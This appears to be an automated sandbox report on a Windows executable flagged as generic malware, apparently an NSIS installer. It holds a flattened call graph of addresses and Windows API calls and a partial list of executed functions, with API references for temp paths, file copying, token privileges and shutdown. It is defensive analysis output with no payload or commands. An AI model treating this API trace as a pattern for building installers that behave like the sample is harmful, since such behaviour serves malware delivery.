5651->5652 5653 402c2f 5652->5653 5661 401000 5662 401037 BeginPaint GetClientRect 5661->5662 5663 40100c DefWindowProcW 5661->5663 5664 4010f3 5662->5664 5668 401179 5663->5668 5666 401073 CreateBrushIndirect FillRect DeleteObject 5664->5666 5667 4010fc 5664->5667 5666->5664 5669 401102 CreateFontIndirectW 5667->5669 5670 401167 EndPaint 5667->5670 5669->5670 5671 401112 6 API calls 5669->5671 5670->5668 5671->5670 5672 401680 5673 402dab 21 API calls 5672->5673 5674 401687 5673->5674 5675 402dab 21 API calls 5674->5675 5676 401690 5675->5676 5677 402dab 21 API calls 5676->5677 5678 401699 MoveFileW 5677->5678 5679 4016a5 5678->5679 5680 4016ac 5678->5680 5682 401423 28 API calls 5679->5682 5681 40687e 2 API calls 5680->5681 5684 4022fb 5680->5684 5683 4016bb 5681->5683 5682->5684 5683->5684 5685 4062e1 40 API calls 5683->5685 5685->5679 5686 401503 5687 401508 5686->5687 5689 401520 5686->5689 5688 402d89 21 API calls 5687->5688 5688->5689 4453 402304 4454 402dab 21 API calls 4453->4454 4455 40230a 4454->4455 4456 402dab 21 API calls 4455->4456 4457 402313 4456->4457 4458 402dab 21 API calls 4457->4458 4459 40231c 4458->4459 4468 40687e FindFirstFileW 4459->4468 4462 402336 lstrlenW lstrlenW 4463 4055a6 28 API calls 4462->4463 4465 402374 SHFileOperationW 4463->4465 4466 402329 4465->4466 4467 402331 4465->4467 4466->4467 4471 4055a6 4466->4471 4469 406894 FindClose 4468->4469 4470 402325 4468->4470 4469->4470 4470->4462 4470->4466 4472 405663 4471->4472 4473 4055c1 4471->4473 4472->4467 4474 4055dd lstrlenW 4473->4474 4475 40655e 21 API calls 4473->4475 4476 405606 4474->4476 4477 4055eb lstrlenW 4474->4477 4475->4474 4479 405619 4476->4479 4480 40560c SetWindowTextW 4476->4480 4477->4472 4478 4055fd lstrcatW 4477->4478 4478->4476 4479->4472 4481 40561f SendMessageW SendMessageW SendMessageW 4479->4481 4480->4479 4481->4472 5690 401a04 5691 402dab 21 API calls 5690->5691 5692 401a0b 5691->5692 5693 402dab 21 API calls 5692->5693 5694 401a14 5693->5694 5695 401a1b lstrcmpiW 5694->5695 5696 401a2d lstrcmpW 5694->5696 5697 401a21 5695->5697 5696->5697 5698 401d86 5699 401d99 GetDlgItem 5698->5699 5700 401d8c 5698->5700 5701 401d93 5699->5701 5702 402d89 21 API calls 5700->5702 5703 401dda GetClientRect LoadImageW SendMessageW 5701->5703 5704 402dab 21 API calls 5701->5704 5702->5701 5706 401e38 5703->5706 5708 401e44 5703->5708 5704->5703 5707 401e3d DeleteObject 5706->5707 5706->5708 5707->5708 5709 402388 5710 40238f 5709->5710 5713 4023a2 5709->5713 5711 40655e 21 API calls 5710->5711 5712 40239c 5711->5712 5712->5713 5714 405b81 MessageBoxIndirectW 5712->5714 5714->5713 5715 402c0a SendMessageW 5716 402c24 InvalidateRect 5715->5716 5717 402c2f 5715->5717 5716->5717 5725 404f0d GetDlgItem GetDlgItem 5726 404f5f 7 API calls 5725->5726 5738 405184 5725->5738 5727 405006 DeleteObject 5726->5727 5728 404ff9 SendMessageW 5726->5728 5729 40500f 5727->5729 5728->5727 5731 405046 5729->5731 5732 40655e 21 API calls 5729->5732 5730 405266 5734 405312 5730->5734 5740 405177 5730->5740 5745 4052bf SendMessageW 5730->5745 5733 4044a0 22 API calls 5731->5733 5737 405028 SendMessageW SendMessageW 5732->5737 5739 40505a 5733->5739 5735 405324 5734->5735 5736 40531c SendMessageW 5734->5736 5747 405336 ImageList_Destroy 5735->5747 5748 40533d 5735->5748 5756 40534d 5735->5756 5736->5735 5737->5729 5738->5730 5759 4051f3 5738->5759 5779 404e5b SendMessageW 5738->5779 5744 4044a0 22 API calls 5739->5744 5742 404507 8 API calls 5740->5742 5741 405258 SendMessageW 5741->5730 5746 405513 5742->5746 5760 40506b 5744->5760 5745->5740 5750 4052d4 SendMessageW 5745->5750 5747->5748 5751 405346 GlobalFree 5748->5751 5748->5756 5749 4054c7 5749->5740 5754 4054d9 ShowWindow GetDlgItem ShowWindow 5749->5754 5753 4052e7 5750->5753 5751->5756 5752 405146 GetWindowLongW SetWindowLongW 5755 40515f 5752->5755 5761 4052f8 SendMessageW 5753->5761 5754->5740 5757 405164 ShowWindow 5755->5757 5758 40517c 5755->5758 5756->5749 5772 405388 5756->5772 5784 404edb 5756->5784 5777 4044d5 SendMessageW 5757->5777 5778 4044d5 SendMessageW 5758->5778 5759->5730 5759->5741 5760->5752 5762 405141 5760->5762 5765 4050be SendMessageW 5760->5765 5766 405110 SendMessageW 5760->5766 5767 4050fc SendMessageW 5760->5767 5761->5734 5762->5752 5762->5755 5765->5760 5766->5760 5767->5760 5769 405492 5770 40549d InvalidateRect 5769->5770 5773 4054a9 5769->5773 5770->5773 5771 4053b6 SendMessageW 5775 4053cc 5771->5775 5772->5771 5772->5775 5773->5749 5793 404e16 5773->5793 5774 405440 SendMessageW SendMessageW 5774->5775 5775->5769 5775->5774 5777->5740 5778->5738 5780 404eba SendMessageW 5779->5780 5781 404e7e GetMessagePos ScreenToClient SendMessageW 5779->5781 5782 404eb2 5780->5782 5781->5782 5783 404eb7 5781->5783 5782->5759 5783->5780 5796 406521 lstrcpynW 5784->5796 5786 404eee 5797 406468 wsprintfW 5786->5797 5788 404ef8 5789 40140b 2 API calls 5788->5789 5790 404f01 5789->5790 5798 406521 lstrcpynW 5790->5798 5792 404f08 5792->5772 5799 404d4d 5793->5799 5795 404e2b 5795->5749 5796->5786 5797->5788 5798->5792 5800 404d66 5799->5800 5801 40655e 21 API calls 5800->5801 5802 404dca 5801->5802 5803 40655e 21 API calls 5802->5803 5804 404dd5 5803->5804 5805 40655e 21 API calls 5804->5805 5806 404deb lstrlenW wsprintfW SetDlgItemTextW 5805->5806 5806->5795 5807 40248f 5808 402dab 21 API calls 5807->5808 5809 4024a1 5808->5809 5810 402dab 21 API calls 5809->5810 5811 4024ab 5810->5811 5824 402e3b 5811->5824 5814 402c2f 5815 4024e3 5817 4024ef 5815->5817 5819 402d89 21 API calls 5815->5819 5816 402dab 21 API calls 5818 4024d9 lstrlenW 5816->5818 5820 40250e RegSetValueExW 5817->5820 5821 4032b9 39 API calls 5817->5821 5818->5815 5819->5817 5822 402524 RegCloseKey 5820->5822 5821->5820 5822->5814 5825 402e56 5824->5825 5828 4063bc 5825->5828 5829 4063cb 5828->5829 5830 4024bb 5829->5830 5831 4063d6 RegCreateKeyExW 5829->5831 5830->5814 5830->5815 5830->5816 5831->5830 5832 404610 lstrlenW 5833 404631 WideCharToMultiByte 5832->5833 5834 40462f 5832->5834 5834->5833 5835 402910 5836 402dab 21 API calls 5835->5836 5837 402917 FindFirstFileW 5836->5837 5838 40293f 5837->5838 5841 40292a 5837->5841 5839 402948 5838->5839 5843 406468 wsprintfW 5838->5843 5844 406521 lstrcpynW 5839->5844 5843->5839 5844->5841 5845 401911 5846 401948 5845->5846 5847 402dab 21 API calls 5846->5847 5848 40194d 5847->5848 5849 405c2d 71 API calls 5848->5849 5850 401956 5849->5850 5851 401491 5852 4055a6 28 API calls 5851->5852 5853 401498 5852->5853 5854 404991 5855 4049bd 5854->5855 5856 4049ce 5854->5856 5915 405b65 GetDlgItemTextW 5855->5915 5858 4049da GetDlgItem 5856->5858 5864 404a39 5856->5864 5861 4049ee 5858->5861 5859 404b1d 5913 404ccc 5859->5913 5917 405b65 GetDlgItemTextW 5859->5917 5860 4049c8 5862 4067cf 5 API calls 5860->5862 5863 404a02 SetWindowTextW 5861->5863 5866 405e9b 4 API calls 5861->5866 5862->5856 5867 4044a0 22 API calls 5863->5867 5864->5859 5868 40655e 21 API calls 5864->5868 5864->5913 5872 4049f8 5866->5872 5873 404a1e 5867->5873 5874 404aad SHBrowseForFolderW 5868->5874 5869 404b4d 5875 405ef8 18 API calls 5869->5875 5870 404507 8 API calls 5871 404ce0 5870->5871 5872->5863 5879 405df0 3 API calls 5872->5879 5876 4044a0 22 API calls 5873->5876 5874->5859 5877 404ac5 CoTaskMemFree 5874->5877 5878 404b53 5875->5878 5880 404a2c 5876->5880 5881 405df0 3 API calls 5877->5881 5918 406521 lstrcpynW 5878->5918 5879->5863 5916 4044d5 SendMessageW 5880->5916 5883 404ad2 5881->5883 5886 404b09 SetDlgItemTextW 5883->5886 5890 40655e 21 API calls 5883->5890 5885 404a32 5888 406915 5 API calls 5885->5888 5886->5859 5887 404b6a 5889 406915 5 API calls 5887->5889 5888->5864 5896 404b71 5889->5896 5891 404af1 lstrcmpiW 5890->5891 5891->5886 5894 404b02 lstrcatW 5891->5894 5892 404bb2 5919 406521 lstrcpynW 5892->5919 5894->5886 5895 404bb9 5897 405e9b 4 API calls 5895->5897 5896->5892 5900 405e3c 2 API calls 5896->5900 5902 404c0a 5896->5902 5898 404bbf GetDiskFreeSpaceW 5897->5898 5901 404be3 MulDiv 5898->5901 5898->5902 5900->5896 5901->5902 5903 404c7b 5902->5903 5904 404e16 24 API calls 5902->5904 5905 40140b 2 API calls 5903->5905 5906 404c9e 5903->5906 5907 404c68 5904->5907 5905->5906 5920 4044c2 KiUserCallbackDispatcher 5906->5920 5909 404c7d SetDlgItemTextW 5907->5909 5910 404c6d 5907->5910 5909->5903 5912 404d4d 24 API calls 5910->5912 5911 404cba 5911->5913 5914 4048ea SendMessageW 5911->5914 5912->5903 5913->5870 5914->5913 5915->5860 5916->5885 5917->5869 5918->5887 5919->5895 5920->5911 5921 7059170d 5922 705915b6 GlobalFree 5921->5922 5924 70591725 5922->5924 5923 7059176b GlobalFree 5924->5923 5925 70591740 5924->5925 5926 70591757 VirtualFree 5924->5926 5925->5923 5926->5923 5927 401914 5928 402dab 21 API calls 5927->5928 5929 40191b 5928->5929 5930 405b81 MessageBoxIndirectW 5929->5930 5931 401924 5930->5931 4815 402896 4816 40289d 4815->4816 4819 402bae 4815->4819 4817 402d89 21 API calls 4816->4817 4818 4028a4 4817->4818 4820 4028b3 SetFilePointer 4818->4820 4820->4819 4821 4028c3 4820->4821 4823 406468 wsprintfW 4821->4823 4823->4819 5932 401f17 5933 402dab 21 API calls 5932->5933 5934 401f1d 5933->5934 5935 402dab 21 API calls 5934->5935 5936 401f26 5935->5936 5937 402dab 21 API calls 5936->5937 5938 401f2f 5937->5938 5939 402dab 21 API calls 5938->5939 5940 401f38 5939->5940 5941 401423 28 API calls 5940->5941 5942 401f3f 5941->5942 5949 405b47 ShellExecuteExW 5942->5949 5944 401f87 5946 402933 5944->5946 5950 4069c0 WaitForSingleObject 5944->5950 5947 401fa4 CloseHandle 5947->5946 5949->5944 5951 4069da 5950->5951 5952 4069ec GetExitCodeProcess 5951->5952 5953 406951 2 API calls 5951->5953 5952->5947 5954 4069e1 WaitForSingleObject 5953->5954 5954->5951 5955 402f98 5956 402fc3 5955->5956 5957 402faa SetTimer 5955->5957 5958 403018 5956->5958 5959 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5956->5959 5957->5956 5959->5958 5960 70591000 5963 7059101b 5960->5963 5964 705915b6 GlobalFree 5963->5964 5965 70591020 5964->5965 5966 70591027 GlobalAlloc 5965->5966 5967 70591024 5965->5967 5966->5967 5968 705915dd 3 API calls 5967->5968 5969 70591019 5968->5969 5970 40551a 5971 40552a 5970->5971 5972 40553e 5970->5972 5973 405530 5971->5973 5982 405587 5971->5982 5974 405546 IsWindowVisible 5972->5974 5980 40555d 5972->5980 5977 4044ec SendMessageW 5973->5977 5975 405553 5974->5975 5974->5982 5978 404e5b 5 API calls 5975->5978 5976 40558c CallWindowProcW 5979 40553a 5976->5979 5977->5979 5978->5980 5980->5976 5981 404edb 4 API calls 5980->5981 5981->5982 5982->5976 5983 401d1c 5984 402d89 21 API calls 5983->5984 5985 401d22 IsWindow 5984->5985 5986 401a25 5985->5986 5987 40149e 5988 4023a2 5987->5988 5989 4014ac PostQuitMessage 5987->5989 5989->5988 4222 401ba0 4223 401bf1 4222->4223 4224 401bad 4222->4224 4225 401c1b GlobalAlloc 4223->4225 4228 401bf6 4223->4228 4229 401c36 4224->4229 4230 401bc4 4224->4230 4241 40655e 4225->4241 4227 40655e 21 API calls 4231 40239c 4227->4231 4236 4023a2 4228->4236 4260 406521 lstrcpynW 4228->4260 4229->4227 4229->4236 4258 406521 lstrcpynW 4230->4258 4231->4236 4261 405b81 4231->4261 4233 401c08 GlobalFree 4233->4236 4235 401bd3 4259 406521 lstrcpynW 4235->4259 4239 401be2 4265 406521 lstrcpynW 4239->4265 4256 406569 4241->4256 4242 4067b0 4243 4067c9 4242->4243 4288 406521 lstrcpynW 4242->4288 4243->4229 4245 406781 lstrlenW 4245->4256 4249 40667a GetSystemDirectoryW 4249->4256 4250 40655e 15 API calls 4250->4245 4251 406690 GetWindowsDirectoryW 4251->4256 4253 40655e 15 API calls 4253->4256 4254 406722 lstrcatW 4254->4256 4256->4242 4256->4245 4256->4249 4256->4250 4256->4251 4256->4253 4256->4254 4257 4066f2 SHGetPathFromIDListW CoTaskMemFree 4256->4257 4266 4063ef 4256->4266 4271 406915 GetModuleHandleA 4256->4271 4277 4067cf 4256->4277 4286 406468 wsprintfW 4256->4286 4287 406521 lstrcpynW 4256->4287 4257->4256 4258->4235 4259->4239 4260->4233 4262 405b96 4261->4262 4263 405baa MessageBoxIndirectW 4262->4263 4264 405be2 4262->4264 4263->4264 4264->4236 4265->4236 4289 40638e 4266->4289 4269 406423 RegQueryValueExW RegCloseKey 4270 406453 4269->4270 4270->4256 4272 406931 4271->4272 4273 40693b GetProcAddress 4271->4273 4293 4068a5 GetSystemDirectoryW 4272->4293 4275 40694a 4273->4275 4275->4256 4276 406937 4276->4273 4276->4275 4284 4067dc 4277->4284 4278 406852 4279 406857 CharPrevW 4278->4279 4281 406878 4278->4281 4279->4278 4280 406845 CharNextW 4280->4278 4280->4284 4281->4256 4283 406831 CharNextW 4283->4284 4284->4278 4284->4280 4284->4283 4285 406840 CharNextW 4284->4285 4296 405e1d 4284->4296 4285->4280 4286->4256 4287->4256 4288->4243 4290 40639d 4289->4290 4291 4063a1 4290->4291 4292 4063a6 RegOpenKeyExW 4290->4292 4291->4269 4291->4270 4292->4291 4294 4068c7 wsprintfW LoadLibraryExW 4293->4294 4294->4276 4297 405e23 4296->4297 4298 405e39 4297->4298 4299 405e2a CharNextW 4297->4299 4298->4284 4299->4297 4316 403fa1 4317 403fb9 4316->4317 4318 40411a 4316->4318 4317->4318 4319 403fc5 4317->4319 4320 40416b 4318->4320 4321 40412b GetDlgItem GetDlgItem 4318->4321 4323 403fd0 SetWindowPos 4319->4323 4324 403fe3 4319->4324 4322 4041c5 4320->4322 4330 401389 2 API calls 4320->4330 4325 4044a0 22 API calls 4321->4325 4343 404115 4322->4343 4389 4044ec 4322->4389 4323->4324 4327 403fec ShowWindow 4324->4327 4328 40402e 4324->4328 4329 404155 SetClassLongW 4325->4329 4331 404107 4327->4331 4332 40400c GetWindowLongW 4327->4332 4333 404036 DestroyWindow 4328->4333 4334 40404d 4328->4334 4335 40140b 2 API calls 4329->4335 4338 40419d 4330->4338 4411 404507 4331->4411 4332->4331 4340 404025 ShowWindow 4332->4340 4388 404429 4333->4388 4336 404052 SetWindowLongW 4334->4336 4337 404063 4334->4337 4335->4320 4336->4343 4337->4331 4341 40406f GetDlgItem 4337->4341 4338->4322 4342 4041a1 SendMessageW 4338->4342 4340->4328 4346 404080 SendMessageW IsWindowEnabled 4341->4346 4349 40409d 4341->4349 4342->4343 4344 40140b 2 API calls 4379 4041d7 4344->4379 4345 40442b DestroyWindow EndDialog 4345->4388 4346->4343 4346->4349 4347 40445a ShowWindow 4347->4343 4348 40655e 21 API calls 4348->4379 4350 4040aa 4349->4350 4352 4040f1 SendMessageW 4349->4352 4353 4040bd 4349->4353 4361 4040a2 4349->4361 4350->4352 4350->4361 4352->4331 4355 4040c5 4353->4355 4356 4040da 4353->4356 4354 4040d8 4354->4331 4405 40140b 4355->4405 4358 40140b 2 API calls 4356->4358 4357 4044a0 22 API calls 4357->4379 4360 4040e1 4358->4360 4360->4331 4360->4361 4408 404479 4361->4408 4363 404252 GetDlgItem 4364 404267 4363->4364 4365 40426f ShowWindow KiUserCallbackDispatcher 4363->4365 4364->4365 4395 4044c2 KiUserCallbackDispatcher 4365->4395 4367 404299 EnableWindow 4372 4042ad 4367->4372 4368 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4369 4042e2 SendMessageW 4368->4369 4368->4372 4369->4372 4372->4368 4396 4044d5 SendMessageW 4372->4396 4397 403f82 4372->4397 4400 406521 lstrcpynW 4372->4400 4374 404311 lstrlenW 4375 40655e 21 API calls 4374->4375 4376 404327 SetWindowTextW 4375->4376 4401 401389 4376->4401 4378 40436b DestroyWindow 4380 404385 CreateDialogParamW 4378->4380 4378->4388 4379->4343 4379->4344 4379->4345 4379->4348 4379->4357 4379->4378 4392 4044a0 4379->4392 4381 4043b8 4380->4381 4380->4388 4382 4044a0 22 API calls 4381->4382 4383 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4382->4383 4384 401389 2 API calls 4383->4384 4385 404409 4384->4385 4385->4343 4386 404411 ShowWindow 4385->4386 4387 4044ec SendMessageW 4386->4387 4387->4388 4388->4343 4388->4347 4390 404504 4389->4390 4391 4044f5 SendMessageW 4389->4391 4390->4379 4391->4390 4393 40655e 21 API calls 4392->4393 4394 4044ab SetDlgItemTextW 4393->4394 4394->4363 4395->4367 4396->4372 4398 40655e 21 API calls 4397->4398 4399 403f90 SetWindowTextW 4398->4399 4399->4372 4400->4374 4403 401390 4401->4403 4402 4013fe 4402->4379 4403->4402 4404 4013cb MulDiv SendMessageW 4403->4404 4404->4403 4406 401389 2 API calls 4405->4406 4407 401420 4406->4407 4407->4361 4409 404480 4408->4409 4410 404486 SendMessageW 4408->4410 4409->4410 4410->4354 4412 4045ca 4411->4412 4413 40451f GetWindowLongW 4411->4413 4412->4343 4413->4412 4414 404534 4413->4414 4414->4412 4415 404561 GetSysColor 4414->4415 4416 404564 4414->4416 4415->4416 4417 404574 SetBkMode 4416->4417 4418 40456a SetTextColor 4416->4418 4419 404592 4417->4419 4420 40458c GetSysColor 4417->4420 4418->4417 4421 4045a3 4419->4421 4422 404599 SetBkColor 4419->4422 4420->4419 4421->4412 4423 4045b6 DeleteObject 4421->4423 4424 4045bd CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 5990 402621 5991 402dab 21 API calls 5990->5991 5992 402628 5991->5992 5995 406011 GetFileAttributesW CreateFileW 5992->5995 5994 402634 5995->5994 4436 4025a3 4448 402deb 4436->4448 4439 402d89 21 API calls 4440 4025b6 4439->4440 4441 4025c5 4440->4441 4446 402933 4440->4446 4442 4025d2 RegEnumKeyW 4441->4442 4443 4025de RegEnumValueW 4441->4443 4444 4025fa RegCloseKey 4442->4444 4443->4444 4445 4025f3 4443->4445 4444->4446 4445->4444 4449 402dab 21 API calls 4448->4449 4450 402e02 4449->4450 4451 40638e RegOpenKeyExW 4450->4451 4452 4025ad 4451->4452 4452->4439 6003 7059103d 6004 7059101b 5 API calls 6003->6004 6005 70591056 6004->6005 4701 4015a8 4702 402dab 21 API calls 4701->4702 4703 4015af SetFileAttributesW 4702->4703 4704 4015c1 4703->4704 6006 401fa9 6007 402dab 21 API calls 6006->6007 6008 401faf 6007->6008 6009 4055a6 28 API calls 6008->6009 6010 401fb9 6009->6010 6011 405b04 2 API calls 6010->6011 6012 401fbf 6011->6012 6013 4069c0 5 API calls 6012->6013 6015 402933 6012->6015 6016 401fe2 CloseHandle 6012->6016 6017 401fd4 6013->6017 6016->6015 6017->6016 6019 406468 wsprintfW 6017->6019 6019->6016 4705 40252f 4706 402deb 21 API calls 4705->4706 4707 402539 4706->4707 4708 402dab 21 API calls 4707->4708 4709 402542 4708->4709 4710 40254d RegQueryValueExW 4709->4710 4713 402933 4709->4713 4711 40256d 4710->4711 4715 402573 RegCloseKey 4710->4715 4711->4715 4716 406468 wsprintfW 4711->4716 4715->4713 4716->4715 6020 40202f 6021 402dab 21 API calls 6020->6021 6022 402036 6021->6022 6023 406915 5 API calls 6022->6023 6024 402045 6023->6024 6025 402061 GlobalAlloc 6024->6025 6026 4020d1 6024->6026 6025->6026 6027 402075 6025->6027 6028 406915 5 API calls 6027->6028 6029 40207c 6028->6029 6030 406915 5 API calls 6029->6030 6031 402086 6030->6031 6031->6026 6035 406468 wsprintfW 6031->6035 6033 4020bf 6036 406468 wsprintfW 6033->6036 6035->6033 6036->6026 6037 4021af 6038 402dab 21 API calls 6037->6038 6039 4021b6 6038->6039 6040 402dab 21 API calls 6039->6040 6041 4021c0 6040->6041 6042 402dab 21 API calls 6041->6042 6043 4021ca 6042->6043 6044 402dab 21 API calls 6043->6044 6045 4021d4 6044->6045 6046 402dab 21 API calls 6045->6046 6047 4021de 6046->6047 6048 40221d CoCreateInstance 6047->6048 6049 402dab 21 API calls 6047->6049 6052 40223c 6048->6052 6049->6048 6050 401423 28 API calls 6051 4022fb 6050->6051 6052->6050 6052->6051 6053 403bb1 6054 403bbc 6053->6054 6055 403bc0 6054->6055 6056 403bc3 GlobalAlloc 6054->6056 6056->6055 6064 401a35 6065 402dab 21 API calls 6064->6065 6066 401a3e ExpandEnvironmentStringsW 6065->6066 6067 401a52 6066->6067 6069 401a65 6066->6069 6068 401a57 lstrcmpW 6067->6068 6067->6069 6068->6069 6075 4023b7 6076 4023c5 6075->6076 6077 4023bf 6075->6077 6079 402dab 21 API calls 6076->6079 6080 4023d3 6076->6080 6078 402dab 21 API calls 6077->6078 6078->6076 6079->6080 6081 402dab 21 API calls 6080->6081 6083 4023e1 6080->6083 6081->6083 6082 402dab 21 API calls 6084 4023ea WritePrivateProfileStringW 6082->6084 6083->6082 6085 4014b8 6086 4014be 6085->6086 6087 401389 2 API calls 6086->6087 6088 4014c6 6087->6088 4829 402439 4830 402441 4829->4830 4831 40246c 4829->4831 4832 402deb 21 API calls 4830->4832 4833 402dab 21 API calls 4831->4833 4834 402448 4832->4834 4835 402473 4833->4835 4836 402452 4834->4836 4840 402480 4834->4840 4841 402e69 4835->4841 4838 402dab 21 API calls 4836->4838 4839 402459 RegDeleteValueW RegCloseKey 4838->4839 4839->4840 4842 402e7d 4841->4842 4844 402e76 4841->4844 4842->4844 4845 402eae 4842->4845 4844->4840 4846 40638e RegOpenKeyExW 4845->4846 4847 402edc 4846->4847 4848 402f91 4847->4848 4849 402ee6 4847->4849 4848->4844 4850 402eec RegEnumValueW 4849->4850 4855 402f0f 4849->4855 4851 402f76 RegCloseKey 4850->4851 4850->4855 4851->4848 4852 402f4b RegEnumKeyW 4853 402f54 RegCloseKey 4852->4853 4852->4855 4854 406915 5 API calls 4853->4854 4856 402f64 4854->4856 4855->4851 4855->4852 4855->4853 4857 402eae 6 API calls 4855->4857 4858 402f86 4856->4858 4859 402f68 RegDeleteKeyW 4856->4859 4857->4855 4858->4848 4859->4848 4860 40173a 4861 402dab 21 API calls 4860->4861 4862 401741 SearchPathW 4861->4862 4863 40175c 4862->4863 6089 401d3d 6090 402d89 21 API calls 6089->6090 6091 401d44 6090->6091 6092 402d89 21 API calls 6091->6092 6093 401d50 GetDlgItem 6092->6093 6094 40263d 6093->6094 6095 406c3f 6097 406ac3 6095->6097 6096 40742e 6097->6096 6098 406b44 GlobalFree 6097->6098 6099 406b4d GlobalAlloc 6097->6099 6100 406bc4 GlobalAlloc 6097->6100 6101 406bbb GlobalFree 6097->6101 6098->6099 6099->6096 6099->6097 6100->6096 6100->6097 6101->6100

                                                                                                                        Executed Functions

                                                                                                                        Function 004034FC Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 47 403840-40385a DeleteFileW call 403082 37->47 48 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->48 38->39 41 4036e0-4036e6 39->41 42 40379b-4037aa call 405e1d 39->42 45 403700-403739 41->45 46 4036e8-4036ef 41->46 42->32 58 4037ac-4037ad 42->58 53 403756-403790 45->53 54 40373b-403740 45->54 51 4036f1-4036f4 46->51 52 4036f6 46->52 64 403860-403866 47->64 65 403a47-403a57 call 403b19 OleUninitialize 47->65 48->47 62 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 48->62 51->45 51->52 52->45 56 403792-403796 53->56 57 403798-40379a 53->57 54->53 60 403742-40374a 54->60 56->57 63 4037bc-4037c9 call 406521 56->63 57->42 58->32 66 403751 60->66 67 40374c-40374f 60->67 62->47 62->65 63->37 70 40386c-403877 call 405e1d 64->70 71 4038ff-403906 call 403bf3 64->71 77 403a59-403a69 call 405b81 ExitProcess 65->77 78 403a7d-403a83 65->78 66->53 67->53 67->66 82 4038c5-4038cf 70->82 83 403879-4038ae 70->83 80 40390b-40390f 71->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->65 86 4038d1-4038df call 405ef8 82->86 87 403914-40393a call 405aec lstrlenW call 406521 82->87 91 4038b0-4038b4 83->91 88 403b0b 84->88 89 403b0f-403b13 ExitProcess 84->89 92 403ad1-403adf call 406915 85->92 93 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->93 86->65 105 4038e5-4038fb call 406521 * 2 86->105 110 40394b-403963 87->110 111 40393c-403946 call 406521 87->111 88->89 96 4038b6-4038bb 91->96 97 4038bd-4038c1 91->97 103 403ae1-403aeb 92->103 104 403aed-403af8 ExitWindowsEx 92->104 93->92 96->97 101 4038c3 96->101 97->91 97->101 101->82 103->104 107 403afa-403afc call 40140b 103->107 104->84 104->107 105->71 107->84 116 403968-40396c 110->116 111->110 118 403971-40399b wsprintfW call 40655e 116->118 122 4039a4 call 405acf 118->122 123 40399d-4039a2 call 405a75 118->123 127 4039a9-4039ab 122->127 123->127 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 127->128 129 4039ad-4039b7 GetFileAttributesW 127->129 137 403a45 128->137 138 403a08-403a29 call 4062e1 call 40655e call 405b04 128->138 131 4039d8-4039e3 129->131 132 4039b9-4039c2 DeleteFileW 129->132 131->116 133 4039e5 131->133 132->131 135 4039c4-4039d6 call 405c2d 132->135 133->65 135->118 135->131 137->65 146 403a2b-403a35 138->146 147 403a6f-403a7b CloseHandle 138->147 146->137 148 403a37-403a3f call 40687e 146->148 147->137 148->118 148->137
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                                                        • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                                                        • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
